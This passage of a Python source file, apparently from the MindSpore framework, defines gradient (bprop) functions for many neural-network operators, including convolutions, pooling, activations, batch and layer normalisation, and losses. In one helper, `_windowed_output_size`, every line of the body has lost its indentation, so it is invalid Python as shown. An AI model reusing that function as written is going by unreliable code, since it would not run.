        pad=self.pad, stride=self.stride, dilation=self.dilation, group=self.group, data_format=self.data_format
    )
    # Gradient w.r.t. the convolution filter.
    filter_grad = G.Conv3DBackpropFilter(
        self.out_channel, self.kernel_size, self.mode, pad_mode=self.pad_mode,
        pad=self.pad, stride=self.stride, dilation=self.dilation, group=self.group, data_format=self.data_format
    )
    get_shape = P.Shape()

    def bprop(x, w, out, dout):
        # NOTE: argument order differs from the Conv2D bprop — here the
        # backprop-input primitive takes (w, dout, x_shape).
        dx = input_grad(w, dout, get_shape(x))
        dw = filter_grad(x, dout, get_shape(w))
        return dx, dw

    return bprop
@bprop_getters.register(nps.Conv3DTranspose)
def get_bprop_conv3d_transpose(self):
    """Grad definition for `Conv3DTranspose` operation.

    The input gradient of a transposed convolution is a regular (forward)
    Conv3D over dout; the filter gradient reuses Conv3DBackpropFilter with
    dout and x swapped relative to the Conv3D bprop.
    """
    input_grad = nps.Conv3D(
        out_channel=self.in_channel, kernel_size=self.kernel_size, mode=self.mode, pad_mode="pad",
        pad=self.pad, stride=self.stride, dilation=self.dilation, group=self.group, data_format=self.data_format
    )
    filter_grad = G.Conv3DBackpropFilter(
        out_channel=self.in_channel, kernel_size=self.kernel_size, mode=self.mode, pad_mode="pad",
        pad=self.pad, stride=self.stride, dilation=self.dilation, group=self.group, data_format=self.data_format
    )
    input_size = self.input_size

    def bprop(x, w, out, dout):
        dx = input_grad(dout, w)
        dw = filter_grad(dout, x, F.shape(w))
        # input_size is a static attribute, not a differentiable input, so
        # its "gradient" is a zeros placeholder.
        return dx, dw, zeros_like(input_size)

    return bprop
@bprop_getters.register(inner.ExtractImagePatches)
def get_bprop_extract_image_patches(self):
    """Grad definition for `ExtractImagePatches` operation.

    The backward pass is expressed as a sparse scatter: a 0/1 matrix maps
    every output-patch element back to the input pixel it was copied from,
    and dout is routed through that matrix with a matmul.
    """
    get_shape = P.Shape()
    reshape = P.Reshape()
    extract_image_patches = inner.ExtractImagePatches(ksizes=self.ksizes,
                                                      strides=self.strides,
                                                      rates=self.rates,
                                                      padding=self.padding)
    concat = P.Concat(axis=-1)
    expand_dims = P.ExpandDims()
    scatter_nd = P.ScatterNd()
    dtype = P.DType()
    fill = P.Fill()
    slice_op = P.Slice()
    transpose = P.Transpose()
    cast = P.Cast()
    matmul = P.MatMul()
    _, _, ksizes_row, ksizes_col = self.ksizes

    def bprop(x, out, dout):
        x_shape = get_shape(x)
        x_batch, x_depth, x_row, x_col = x_shape
        # Index 0 is reserved for "padding" pixels, so input pixels are
        # numbered 1..x_row*x_col.
        x_indices_num = x_row * x_col + 1
        x_idx = cast(F.tuple_to_array(range(1, x_indices_num)), mstype.float32)
        x_idx = reshape(x_idx, (1, 1, x_row, x_col))
        # Run the forward op on the index image to learn, for every output
        # patch element, which input pixel it came from.
        x_idx_patch = cast(extract_image_patches(x_idx), mstype.int32)
        x_idx_patch = transpose(x_idx_patch, (0, 2, 3, 1))
        out_shape = get_shape(out)
        _, _, out_row, out_col = out_shape
        out_indices_num = out_row * out_col * ksizes_row * ksizes_col
        out_idx = F.tuple_to_array(range(out_indices_num))
        out_idx = reshape(out_idx, (1, out_row, out_col, ksizes_row * ksizes_col))
        # Pair (input index, output index) and scatter 1s into a sparse
        # (x_indices_num, out_indices_num) routing matrix.
        idx_tensor = concat((expand_dims(x_idx_patch, -1), expand_dims(out_idx, -1)))
        idx_tensor = reshape(idx_tensor, (-1, 2))
        sp_shape = (x_indices_num, out_indices_num)
        sp_tensor = scatter_nd(idx_tensor, fill(dtype(dout), (out_indices_num,), 1), sp_shape)
        # Drop row 0 (the padding bucket).
        sp_tensor = slice_op(sp_tensor, (1, 0), (x_indices_num - 1, out_indices_num))
        grad = transpose(dout, (0, 2, 3, 1))
        grad = reshape(grad, (x_batch, out_row, out_col, ksizes_row, ksizes_col, x_depth))
        grad = transpose(grad, (1, 2, 3, 4, 0, 5))
        grad = reshape(grad, (-1, x_batch * x_depth))
        # Accumulate each output-element gradient onto its source pixel.
        jac = matmul(sp_tensor, grad)
        dx = reshape(jac, (x_row, x_col, x_batch, x_depth))
        dx = transpose(dx, (2, 3, 0, 1))
        return (dx,)

    return bprop
@bprop_getters.register(P.DepthwiseConv2dNative)
def get_bprop_depthwise_conv2d_native(self):
    """Grad definition for `DepthwiseConv2dNative` operation.

    Returns a bprop(x, w, out, dout) closure producing (dx, dw).
    """
    # Gradient w.r.t. the input feature map.
    input_grad = G.DepthwiseConv2dNativeBackpropInput(
        self.channel_multiplier, self.kernel_size, self.pad_mode, self.pad, self.pad_list, self.mode, self.stride,
        self.dilation, self.group
    )
    # Gradient w.r.t. the depthwise filter.
    filter_grad = G.DepthwiseConv2dNativeBackpropFilter(
        self.channel_multiplier, self.kernel_size, self.pad_mode, self.pad, self.pad_list, self.mode, self.stride,
        self.dilation, self.group
    )
    get_shape = P.Shape()

    def bprop(x, w, out, dout):
        dx = input_grad(get_shape(x), w, dout)
        if env_force_bprop_seq == '1':
            # ENV_FORCE_BPROP_SEQ=1 forces dw to be computed after dx by
            # inserting a data dependency on dx.
            x = F.depend(x, dx)
        dw = filter_grad(x, get_shape(w), dout)
        return dx, dw

    return bprop
@bprop_getters.register(P.MaxPoolWithArgmax)
def get_bprop_max_pool_with_argmax(self):
    """Grad definition for `MaxPoolWithArgmax` operation."""
    grad_op = G.MaxPoolGradWithArgmax(
        kernel_size=self.kernel_size,
        strides=self.strides,
        pad_mode=self.pad_mode)

    def bprop(x, out, dout):
        # dout[0] is the gradient of the pooled values; out[1] holds the
        # argmax indices saved by the forward pass.
        return (grad_op(x, dout[0], out[1]),)

    return bprop
@bprop_getters.register(G.MaxPoolGrad)
def get_bprop_max_pool_grad_grad(self):
    """Grad definition for `MaxPoolGrad` operation."""
    grad_grad_op = G.MaxPoolGradGrad(
        kernel_size=self.kernel_size,
        strides=self.strides,
        pad_mode=self.pad_mode)

    def bprop(x1, x2, grad, out, dout):
        # Only the incoming gradient argument gets a non-zero derivative;
        # x1/x2 receive zeros placeholders.
        return (zeros_like(x1), zeros_like(x2), grad_grad_op(x1, x2, dout))

    return bprop
@bprop_getters.register(G.MaxPoolGradGrad)
def get_bprop_max_pool_grad_grad_grad(self):
    """Grad definition for `MaxPoolGradGrad` operation."""
    grad_op = G.MaxPoolGrad(
        kernel_size=self.kernel_size,
        strides=self.strides,
        pad_mode=self.pad_mode)

    def bprop(x1, x2, grad, out, dout):
        # Only the incoming gradient argument gets a non-zero derivative;
        # x1/x2 receive zeros placeholders.
        return (zeros_like(x1), zeros_like(x2), grad_op(x1, x2, dout))

    return bprop
@bprop_getters.register(P.MaxPool)
def get_bprop_max_pool_grad(self):
    """Grad definition for `MaxPool` operation."""
    grad_op = G.MaxPoolGrad(
        kernel_size=self.kernel_size,
        strides=self.strides,
        pad_mode=self.pad_mode,
        data_format=self.format)

    def bprop(x, out, dout):
        # Route dout back to the max positions found in the forward pass.
        return (grad_op(x, out, dout),)

    return bprop
def _windowed_output_size(input_size, ksize, stride, pad_mode):
"""
helper func for AvgPoolGrad
"""
tmp_output = 0
tmp_pad_need = 0
tmp_pad_before = 0
tmp_pad_after = 0
if pad_mode == 'VALID':
tmp_output = (input_size - ksize + stride) // stride
tmp_pad_before = 0
tmp_pad_after = 0
elif pad_mode == 'SAME':
tmp_output = (input_size + stride - 1) // stride
tmp_pad_need = max(0, (tmp_output - 1) * stride + ksize - input_size)
tmp_pad_before = tmp_pad_need // 2
tmp_pad_after = tmp_pad_need - tmp_pad_before
return tmp_output, tmp_pad_before, tmp_pad_after
@constexpr
def _get_mean_matrix(x_shape, ksize, stride, pad_mode, x_dtype):
    """
    helper func for AvgPoolGrad.
    `assist_input_matrix` is a 2d matrix with input_shape after padding,
    the value of element which is padded is 0, else are 1.
    For each element of output, it is mapped for slide window: `[h*h_stride : h*h_stride + h_ksize,
    w*w_stride : w*w_stride + w_ksize]` of `assist_input_matrix`, so the sum of slide window is the
    number of input that associate with output element.

    Returns a Tensor of shape (N, C, h_out, w_out) whose entries are
    1 / (count of non-padded inputs in that window), or 0 for an all-pad
    window — i.e. the averaging weights the gradient must be scaled by.
    """
    # Shapes/strides are NCHW; only the spatial dims (index 2, 3) matter.
    n_input, c_input, h_input, w_input = x_shape
    h_ksize, w_ksize = ksize[2], ksize[3]
    h_stride, w_stride = stride[2], stride[3]
    n_output = n_input
    c_output = c_input
    h_output, w_output = 0, 0
    pad_top, pad_bottom, pad_left, pad_right = 0, 0, 0, 0
    h_output, pad_top, pad_bottom = _windowed_output_size(h_input, h_ksize,
                                                          h_stride, pad_mode)
    w_output, pad_left, pad_right = _windowed_output_size(w_input, w_ksize,
                                                          w_stride, pad_mode)

    output_size = n_output * c_output * h_output * w_output
    output_shape = (n_output, c_output, h_output, w_output)
    output = np.array([0.0] * output_size)
    output = np.reshape(output, output_shape)

    # 1 marks a real input pixel, 0 marks padding.
    in_shape_after_padding_2d = (h_input + pad_top + pad_bottom, w_input + pad_left + pad_right)
    assist_input_matrix = np.ones(in_shape_after_padding_2d).astype(np.float32)
    if pad_top > 0:
        assist_input_matrix[:pad_top, :] = 0
    if pad_bottom > 0:
        assist_input_matrix[-pad_bottom:, :] = 0
    if pad_left > 0:
        assist_input_matrix[:, :pad_left] = 0
    if pad_right > 0:
        assist_input_matrix[:, -pad_right:] = 0

    # The window sum counts how many real inputs feed each output element.
    for h in range(h_output):
        for w in range(w_output):
            curr_input = assist_input_matrix[h*h_stride : h*h_stride + h_ksize, w*w_stride : w*w_stride + w_ksize]
            curr_sum = np.sum(curr_input)
            if curr_sum > 0:
                output[:, :, h, w] = 1. / curr_sum
    return Tensor(output, x_dtype)
@constexpr
def _get_kernel_matrix(x_shape_nchw, kernel_matrix_shape, pad_mode, x_dtype):
    """Build an all-ones kernel Tensor for AvgPoolGradVm (x_shape_nchw and pad_mode are unused here)."""
    kernel_matrix = np.ones(kernel_matrix_shape)
    return Tensor(kernel_matrix, x_dtype)
@bprop_getters.register(P.AvgPool)
def get_bprop_avg_pool_grad(self):
    """Grad definition for `AvgPool` operation."""
    # Each backend exposes a different AvgPool grad kernel with a different
    # call signature, so a backend-specific bprop closure is selected here.
    if self.target == "GPU":
        avgpool_grad_gpu = G.AvgPoolGradGpu(
            kernel_size=self.kernel_size,
            strides=self.strides,
            pad_mode=self.pad_mode,
            data_format=self.format)
        def bprop_gpu(x, out, dout):
            dx = avgpool_grad_gpu(x, out, dout)
            return (dx,)
        bprop_fn = bprop_gpu
    elif self.target == "CPU":
        avgpool_grad_cpu = G.AvgPoolGradCpu(
            kernel_size=self.kernel_size,
            strides=self.strides,
            pad_mode=self.pad_mode,
            data_format=self.format)
        def bprop_cpu(x, out, dout):
            dx = avgpool_grad_cpu(x, out, dout)
            return (dx,)
        bprop_fn = bprop_cpu
    elif self.target == "GE":
        avgpool_grad_ge = G.AvgPoolGrad(
            kernel_size=self.kernel_size,
            strides=self.strides,
            pad_mode=self.pad_mode)
        shape_op = P.Shape()
        def bprop_ge(x, out, dout):
            # GE kernel only needs the forward input's shape, not its values.
            dx = avgpool_grad_ge(shape_op(x), dout)
            return (dx,)
        bprop_fn = bprop_ge
    else:
        avgpool_grad_vm = G.AvgPoolGradVm(
            kernel_size=self.kernel_size,
            strides=self.strides,
            pad_mode=self.pad_mode)
        k_size_nchw = avgpool_grad_vm.kernel_size
        stride_nchw = avgpool_grad_vm.strides
        pad_mode = self.pad_mode
        def bprop_vm(x, out, dout):
            x_shape_nchw = F.shape(x)
            x_dtype = F.dtype(x)
            kernel_matrix_shape = (1, x_shape_nchw[1],
                                   k_size_nchw[2],
                                   k_size_nchw[3])
            # VM kernel needs precomputed 1/window_count coefficients and a
            # ones kernel; both are built at compile time via @constexpr helpers.
            mean_matrix = _get_mean_matrix(x_shape_nchw, k_size_nchw, stride_nchw, pad_mode, x_dtype)
            kernel_matrix = _get_kernel_matrix(x_shape_nchw, kernel_matrix_shape, pad_mode, x_dtype)
            dx = avgpool_grad_vm(x_shape_nchw, dout, mean_matrix, kernel_matrix)
            return (dx,)
        bprop_fn = bprop_vm
    return bprop_fn
@bprop_getters.register(P.DropoutGenMask)
def get_bprop_dropout_gen_mask(self):
    """Grad definition for `DropoutGenMask` operation."""
    def bprop(shape, keep_prob, out, dout):
        # Mask generation carries no gradient; both inputs get zeros.
        return (zeros_like(shape), zeros_like(keep_prob))
    return bprop
@bprop_getters.register(P.DropoutDoMask)
def get_bprop_dropout_do_mask(self):
    """Grad definition for `DropoutDoMask` operation."""
    do_mask = P.DropoutDoMask()
    def bprop(x, y, keep_prob, out, dout):
        # Re-applying the same mask to dout propagates gradient only through kept elements.
        return (do_mask(dout, y, keep_prob), zeros_like(y), zeros_like(keep_prob))
    return bprop
@bprop_getters.register(P.Mish)
def get_bprop_mish(self):
    """Grad definition for `Mish` operation."""
    tanh = P.Tanh()
    tanh_grad = SG.TanhGrad()
    softplus = P.Softplus()
    softplus_grad = G.SoftplusGrad()
    def bprop(x, out, dout):
        # mish(x) = x * tanh(softplus(x)); dx combines the product-rule terms.
        dx1 = tanh(softplus(x))
        dx2 = softplus_grad(tanh_grad(dx1, x * dout), x)
        dx = (dx1 * dout + dx2)
        return (dx,)
    return bprop
@bprop_getters.register(P.SeLU)
def get_bprop_selu(self):
    """Grad definition for `SeLU` operation."""
    # SeLU's scale constant; SeLU grad is the Elu grad scaled by it.
    scale = 1.0507009873554804934193349852946
    elu_grad = G.EluGrad()
    def bprop(x, out, dout):
        dx = elu_grad(dout, out) * scale
        return (dx,)
    return bprop
@bprop_getters.register(P.MulNoNan)
def get_bprop_mul_no_nan(self):
    """Grad definition for `MulNoNan` operation."""
    mul_no_nan = P.MulNoNan()
    reduce_sum = P.ReduceSum()
    reshape = P.Reshape()
    def bprop(x, y, out, dout):
        x_shape = F.shape(x)
        y_shape = F.shape(y)
        dx = mul_no_nan(dout, y)
        dy = mul_no_nan(x, dout)
        # If an input was broadcast in the forward pass, sum its gradient
        # over the broadcast axes and reshape back to the input's shape.
        broadcast_x, broadcast_y = F.broadcast_gradient_args(x_shape, y_shape)
        if broadcast_x != ():
            dx = reshape(reduce_sum(dx, broadcast_x), x_shape)
        if broadcast_y != ():
            dy = reshape(reduce_sum(dy, broadcast_y), y_shape)
        return dx, dy
    return bprop
@bprop_getters.register(P.ReLU)
def get_bprop_relu(self):
    """Grad definition for `ReLU` operation."""
    input_grad = G.ReluGrad()
    def bprop(x, out, dout):
        # ReluGrad takes (dout, forward_output); one gradient per forward input.
        dx = input_grad(dout, out)
        return (dx,)
    return bprop
@bprop_getters.register(G.ReluGrad)
def get_bprop_relu_grad(self):
    """Grad definition for `ReLUGrad` operation (second-order gradient)."""
    input_grad = G.ReluGrad()
    def bprop(grad, y, out, dout):
        # The gradient of ReluGrad w.r.t. its `grad` input is masked the same way.
        dgrad = input_grad(dout, y)
        return dgrad, zeros_like(y)
    return bprop
@bprop_getters.register(P.ReLU6)
def get_bprop_relu6(self):
    """Grad definition for `ReLU6` operation."""
    input_grad = G.ReLU6Grad()
    def bprop(x, out, dout):
        # ReLU6Grad takes (dout, forward_input), unlike ReluGrad which takes the output.
        dx = input_grad(dout, x)
        return (dx,)
    return bprop
@bprop_getters.register(P.ReLUV2)
def get_bprop_relu_v2(self):
    """Grad definition for `ReLUV2` operation."""
    input_grad = G.ReluGradV2()
    def bprop(x, out, dout):
        # ReLUV2's forward returns (output, mask); the mask drives the backward pass.
        mask = out[1]
        dx = input_grad(dout[0], mask)
        return (dx,)
    return bprop
@bprop_getters.register(P.HSwish)
def get_bprop_hswish(self):
    """Grad definition for `HSwish` operation."""
    input_grad = G.HSwishGrad()
    def bprop(x, out, dout):
        # HSwishGrad takes (dout, forward_input).
        dx = input_grad(dout, x)
        return (dx,)
    return bprop
@bprop_getters.register(P.HSigmoid)
def get_bprop_hsigmoid(self):
    """Grad definition for `HSigmoid` operation."""
    input_grad = G.HSigmoidGrad()
    def bprop(x, out, dout):
        # HSigmoidGrad takes (dout, forward_input).
        dx = input_grad(dout, x)
        return (dx,)
    return bprop
@bprop_getters.register(P.Elu)
def get_bprop_elu(self):
    """Grad definition for `Elu` operation."""
    input_grad = G.EluGrad()
    def bprop(x, out, dout):
        # EluGrad takes (dout, forward_output).
        dx = input_grad(dout, out)
        return (dx,)
    return bprop
@bprop_getters.register(P.Sigmoid)
def get_bprop_sigmoid(self):
    """Grad definition for `Sigmoid` operation."""
    input_grad = G.SigmoidGrad()
    def bprop(x, out, dout):
        # SigmoidGrad takes (forward_output, dout) — note the argument order.
        dx = input_grad(out, dout)
        return (dx,)
    return bprop
@bprop_getters.register(G.SigmoidGrad)
def get_bprop_sigmoid_grad(self):
    """Grad definition for `SigmoidGrad` operation (second-order gradient)."""
    sigmoid_grad = G.SigmoidGrad()
    def bprop(y, grad, out, dout):
        # d/dy of grad*y*(1-y) is grad*(1-2y); d/dgrad reuses the first-order kernel.
        dy = dout * grad * (1. - 2 * y)
        dgrad = sigmoid_grad(y, dout)
        return dy, dgrad
    return bprop
@constexpr
def _get_transpose_axis(x_shp, axis):
    """Return the permutation that swaps `axis` with the last dimension.

    Args:
        x_shp (tuple): shape of the tensor being transposed; only its length is used.
        axis (int): axis to move to the back; may be negative.

    Returns:
        tuple[int]: identity permutation of length len(x_shp) with `axis`
        and the last position exchanged. Applying it twice is the identity,
        so the same permutation also transposes back.
    """
    rank = len(x_shp)
    if axis < 0:
        axis += rank
    reverse_axis = list(range(rank))
    # Exchange `axis` and the final position in one tuple-swap.
    reverse_axis[axis], reverse_axis[rank - 1] = rank - 1, axis
    return tuple(reverse_axis)
@bprop_getters.register(P.Softmax)
def get_bprop_softmax(self):
    """Grad definition for `Softmax` operation."""
    sum_func = P.ReduceSum(keep_dims=True)
    sub = P.Sub()
    mul = P.Mul()
    get_shape = P.Shape()
    transpose = P.Transpose()
    axis = self.axis
    # The op may carry a tuple of axes; only the first is used here.
    if not isinstance(axis, int):
        axis = axis[0]
    def bprop(x, out, dout):
        # dx = (dout - sum(dout * out)) * out
        # This formula is correct only when the `axis` is the last dimension.
        # In order to support the scenario where the `axis` is other values,
        # we transpose the data of the `axis` dimension to the last dimension for calculation,
        # and then transpose it back after the calculation.
        reverse_axis = _get_transpose_axis(get_shape(x), axis)
        out = transpose(out, reverse_axis)
        dout = transpose(dout, reverse_axis)
        dx = mul(out, sub(dout, sum_func(mul(out, dout), -1)))
        # The swap permutation is its own inverse, so reusing it undoes the transpose.
        dx = transpose(dx, reverse_axis)
        return (dx,)
    return bprop
@bprop_getters.register(P.LogSoftmax)
def get_bprop_log_softmax(self):
    """Grad definition for `LogSoftmax` operation."""
    logsoftmax_grad = G.LogSoftmaxGrad(self.axis)
    def bprop(x, out, dout):
        # Dedicated kernel takes (forward_output, dout).
        dx = logsoftmax_grad(out, dout)
        return (dx,)
    return bprop
@bprop_getters.register(P.Softplus)
def get_bprop_softplus(self):
    """Grad definition for `Softplus` operation."""
    softplus_grad = G.SoftplusGrad()
    def bprop(x, out, dout):
        # SoftplusGrad takes (dout, forward_input).
        dx = softplus_grad(dout, x)
        return (dx,)
    return bprop
@bprop_getters.register(P.Softsign)
def get_bprop_softsign(self):
    """Grad definition for `Softsign` operation."""
    mul = P.Mul()
    absolute = P.Abs()
    div = P.Div()
    square = P.Square()
    def bprop(x, out, dout):
        # Derivative computed inline: d/dx softsign(x) = 1 / (1 + |x|)^2.
        dx = mul(dout, div(1, square(1 + absolute(x))))
        return (dx,)
    return bprop
@bprop_getters.register(P.Tanh)
def get_bprop_tanh(self):
    """Grad definition for `Tanh` operation."""
    tanh_grad = SG.TanhGrad()
    def bprop(x, out, dout):
        # TanhGrad takes (forward_output, dout).
        dx = tanh_grad(out, dout)
        return (dx,)
    return bprop
@bprop_getters.register(G.TanhGrad)
def get_bprop_tanh_grad(self):
    """Grad definition for `TanhGrad` operation (second-order gradient)."""
    tanh_grad = G.TanhGrad()
    def bprop(y, grad, out, dout):
        # d/dy of grad*(1-y^2) is -2*grad*y; d/dgrad reuses the first-order kernel.
        dy = dout * -2.0 * grad * y
        dgrad = tanh_grad(y, dout)
        return dy, dgrad
    return bprop
@bprop_getters.register(P.Gelu)
def get_bprop_gelu(self):
    """Grad definition for `Gelu` operation."""
    input_grad = G.GeluGrad()
    def bprop(x, out, dout):
        # GeluGrad takes (dout, forward_input, forward_output).
        dx = input_grad(dout, x, out)
        return (dx,)
    return bprop
@bprop_getters.register(P.FastGelu)
def get_bprop_fast_gelu(self):
    """Grad definition for `FastGelu` operation."""
    input_grad = G.FastGeluGrad()
    def bprop(x, out, dout):
        # FastGeluGrad takes (dout, forward_input).
        dx = input_grad(dout, x)
        return (dx,)
    return bprop
@bprop_getters.register(P.FusedBatchNorm)
def get_bprop_fused_batch_norm(self):
    """Grad definition for `FusedBatchNorm` operation."""
    input_grad = G.FusedBatchNormGrad(self.epsilon, self.momentum)
    # The CPU grad kernel has a different signature (also takes the bias).
    target_cpu = False
    if self.target == "CPU":
        input_grad = G.FusedBatchNormGradCPU(self.epsilon, self.momentum)
        target_cpu = True
    def bprop(x, scale, b, mean, variance, out, dout):
        # Forward saves batch statistics in out[3]/out[4] for the backward pass.
        saved_mean = out[3]
        saved_variance = out[4]
        if target_cpu:
            out = input_grad(dout[0], x, scale, b, saved_mean, saved_variance)
        else:
            out = input_grad(dout[0], x, scale, saved_mean, saved_variance)
        dx = out[0]
        dscale = out[1]
        dbias = out[2]
        # Running mean/variance are state, not differentiable inputs.
        return dx, dscale, dbias, zeros_like(mean), zeros_like(variance)
    return bprop
@bprop_getters.register(P.FusedBatchNormEx)
def get_bprop_fused_batch_norm_ex(self):
    """Grad definition for `FusedBatchNormEx` operation."""
    input_grad = G.FusedBatchNormGradEx(self.epsilon, self.momentum, self.format)
    def bprop(x, scale, b, mean, variance, out, dout):
        # Forward saves batch statistics and a reserve workspace in out[3..5].
        saved_mean = out[3]
        saved_variance = out[4]
        reserve = out[5]
        out = input_grad(dout[0], x, scale, saved_mean, saved_variance, reserve)
        dx = out[0]
        dscale = out[1]
        dbias = out[2]
        # Running mean/variance are state, not differentiable inputs.
        return dx, dscale, dbias, zeros_like(mean), zeros_like(variance)
    return bprop
@bprop_getters.register(P.InstanceNorm)
def get_bprop_instance_norm(self):
    """Grad definition for `InstanceNorm` operation."""
    is_training = self.is_training
    input_grad = G.InstanceNormGrad(is_training, self.epsilon, self.momentum)
    def bprop(x, gamma, beta, mean, variance, out, dout):
        # Forward saves per-instance statistics in out[1]/out[2].
        saved_mean = out[1]
        saved_variance = out[2]
        out = input_grad(dout[0], x, gamma, saved_mean, saved_variance)
        dx = out[0]
        dgamma = out[1]
        dbeta = out[2]
        # Running mean/variance are state, not differentiable inputs.
        return dx, dgamma, dbeta, zeros_like(mean), zeros_like(variance)
    return bprop
@bprop_getters.register(P.BatchNorm)
def get_bprop_batch_norm(self):
    """Grad definition for `BatchNorm` operation."""
    is_training = self.is_training
    input_grad = G.BatchNormGrad(is_training, self.epsilon)
    def bprop(x, scale, b, mean, variance, out, dout):
        # Training mode uses the statistics saved by the forward pass;
        # inference mode uses the supplied running mean/variance.
        if is_training:
            saved_reserve_1 = out[3]
            saved_reserve_2 = out[4]
        else:
            saved_reserve_1 = mean
            saved_reserve_2 = variance
        out = input_grad(dout[0], x, scale, saved_reserve_1, saved_reserve_2)
        dx = out[0]
        dscale = out[1]
        dbias = out[2]
        return dx, dscale, dbias, zeros_like(mean), zeros_like(variance)
    return bprop
@bprop_getters.register(P.LayerNorm)
def get_bprop_layer_norm(self):
    """Grad definition for `LayerNorm` operation."""
    layer_norm_grad = G.LayerNormGrad(self.begin_norm_axis, self.begin_params_axis)
    def bprop(x, gamma, beta, out, dout):
        # out[1]/out[2] are the mean/variance saved by the forward pass.
        dx, d_gamma, d_beta = layer_norm_grad(
            x, dout[0], out[2], out[1], gamma)
        return dx, d_gamma, d_beta
    return bprop
@bprop_getters.register(G.LayerNormGrad)
def get_bprop_layer_norm_grad(self):
    """Grad definition for `LayerNormGrad` operation (second-order gradient)."""
    layer_norm_grad_grad = G.LayerNormGradGrad(self.begin_norm_axis, self.begin_params_axis)
    def bprop(x, dy, variance, mean, gamma, out, dout):
        d_x, d_dy, d_gamma = layer_norm_grad_grad(
            x, dy, variance, mean, gamma, dout[0], dout[1], dout[2])
        # Saved statistics receive no gradient.
        return d_x, d_dy, zeros_like(variance), zeros_like(mean), d_gamma
    return bprop
@bprop_getters.register(P.L2Normalize)
def get_bprop_l2normalize(self):
    """Grad definition for `L2Normalize` operation."""
    input_grad = G.L2NormalizeGrad(self.axis, self.epsilon)
    def bprop(x, out, dout):
        # Kernel takes (forward_input, forward_output, dout).
        dx = input_grad(x, out, dout)
        return (dx,)
    return bprop
@bprop_getters.register(P.SoftmaxCrossEntropyWithLogits)
def get_bprop_softmax_cross_entropy_with_logits(self):
    """Grad definition for `SoftmaxCrossEntropyWithLogits` operation."""
    expand = P.ExpandDims()
    def bprop(logits, labels, out, dout):
        # out[1] is the per-logit gradient already computed by the forward pass;
        # scale it by the incoming loss gradient (broadcast over the class dim).
        grad = out[1]
        grad = grad * expand(dout[0], -1)
        return grad, zeros_like(labels)
    return bprop
@bprop_getters.register(P.NLLLoss)
def get_bprop_nll_loss(self):
    """Grad definition for `NLLLoss` operation."""
    nll_loss_grad = G.NLLLossGrad(reduction=self.reduction)
    def bprop(x, target, weight, out, dout):
        # out[1] is the total_weight produced by the forward pass.
        total_weight = out[1]
        dout_x = dout[0]
        dx = nll_loss_grad(x, dout_x, target, weight, total_weight)
        # Targets and class weights are not differentiable.
        return dx, zeros_like(target), zeros_like(weight)
    return bprop
@bprop_getters.register(P.SparseSoftmaxCrossEntropyWithLogits)
def get_bprop_sparse_softmax_cross_entropy_with_logits(self):
    """Grad definition for `SparseSoftmaxCrossEntropyWithLogits` operation."""
    is_grad = self.is_grad
    grad_op = P.SparseSoftmaxCrossEntropyWithLogits(is_grad=True)
    def bprop(logits, labels, out, dout):
        grad = out[0]
        if not is_grad:
            # if construct use loss
            # Forward produced the loss, so recompute the gradient here;
            # `depend` keeps the recomputation ordered after the forward op.
            grad = grad_op(logits, labels)
            grad = F.depend(grad, out)
            grad = grad * dout
        return grad, zeros_like(labels)
    return bprop
@bprop_getters.register(P.ResizeBilinear)
def get_bprop_resize_bilinear(self):
    """Grad definition for `ResizeBilinear` operation."""
    resize_grad = G.ResizeBilinearGrad(self.align_corners)
    def bprop(x, out, dout):
        # Kernel takes (dout, forward_input) to recover the original size.
        dx = resize_grad(dout, x)
        return (dx,)
    return bprop
@bprop_getters.register(P.OneHot)
def get_bprop_onehot(self):
    """Grad definition for `OneHot` operation."""
    def bprop(indices, depth, on_value, off_value, out, dout):
        # OneHot is non-differentiable w.r.t. all of its inputs.
        return zeros_like(indices), zeros_like(depth), zeros_like(on_value), zeros_like(off_value)
    return bprop
@constexpr
def _range_op(start, limit, delta, dtype):
    """helper function for Grad TopK: build Tensor([start, start+delta, ...)) below `limit`."""
    output_tensor = Tensor(list(range(start, limit, delta)), dtype)
    return output_tensor
@constexpr
def _get_1d_shape(in_shape):
    """helper function for Grad TopK: flatten a shape tuple into (total_elements,)."""
    out_shape = 1
    for i in in_shape:
        out_shape *= i
    return (out_shape,)
@bprop_getters.register(P.TopK)
def get_bprop_top_kv2(self):
    """Grad definition for `TopK` operation."""
    scatter = P.ScatterNd()
    expand_dims = P.ExpandDims()
    shape_op = P.Shape()
    reshape_op = P.Reshape()
    dtype = P.DType()
    def bprop(input_x, k, out, dout):
        # Scatter dout[0] back to the selected positions; everything else is zero.
        in_shape = shape_op(input_x)
        in_lastdim = in_shape[-1]
        indices = out[1]
        ind_shape = shape_op(indices)
        ind_lastdim = ind_shape[-1]
        # Collapse leading dims so indices can be offset into a flat buffer.
        ind_2d = reshape_op(indices, (-1, ind_lastdim))
        outerdim = shape_op(ind_2d)[0]
        # [0, outterdim, 2*outerdim, ..., (k-1)*outerdim]
        indices_dtype = dtype(indices)
        range_flatten_index = _range_op(0, outerdim * in_lastdim, in_lastdim, indices_dtype)
        # expand_dims to (k, 1), then broadcast
        ind = reshape_op(ind_2d + expand_dims(range_flatten_index, -1), (-1,))
        in_shape_1d = _get_1d_shape(in_shape)
        out_grad = reshape_op(
            scatter(
                expand_dims(ind, -1),
                reshape_op(dout[0], (-1,)),
                in_shape_1d),
            in_shape)
        return out_grad, zeros_like(k)
    return bprop
@bprop_getters.register(P.SmoothL1Loss)
def get_bprop_smooth_l1_loss(self):
    """Grad definition for `SmoothL1Loss` operation."""
    grad = G.SmoothL1LossGrad(self.beta)
    def bprop(prediction, target, out, dout):
        # The loss is symmetric in its arguments, so the same kernel with
        # the arguments swapped yields the gradient for the target.
        dx = grad(prediction, target, dout)
        dy = grad(target, prediction, dout)
        return dx, dy
    return bprop
@bprop_getters.register(P.L2Loss)
def get_bprop_l2_loss(self):
    """Grad definition for `L2Loss` operation."""
    def bprop(x, out, dout):
        # Gradient is the input itself scaled by the incoming (scalar) gradient.
        dx = x * dout
        return (dx,)
    return bprop
@bprop_getters.register(P.RNNTLoss)
def get_bprop_rnnt_loss(self):
    """Grad definition for `RNNTLoss` operation."""
    def bprop(acts, labels, act_lens, label_lens, out, dout):
        # out[1] already holds the gradient w.r.t. the activations.
        grad = out[1]
        return grad, zeros_like(labels), zeros_like(act_lens), zeros_like(label_lens)
    return bprop
@bprop_getters.register(P.PReLU)
def get_bprop_prelu(self):
    """Grad definition for `PReLU` operation."""
    grad = G.PReLUGrad()
    def bprop(x, w, out, dout):
        # One fused kernel returns gradients for both the input and the slope weight.
        dx, dw = grad(dout, x, w)
        return dx, dw
    return bprop
@bprop_getters.register(P.LSTM)
def get_bprop_lstm(self):
    """Grad definition for `LSTM` operation."""
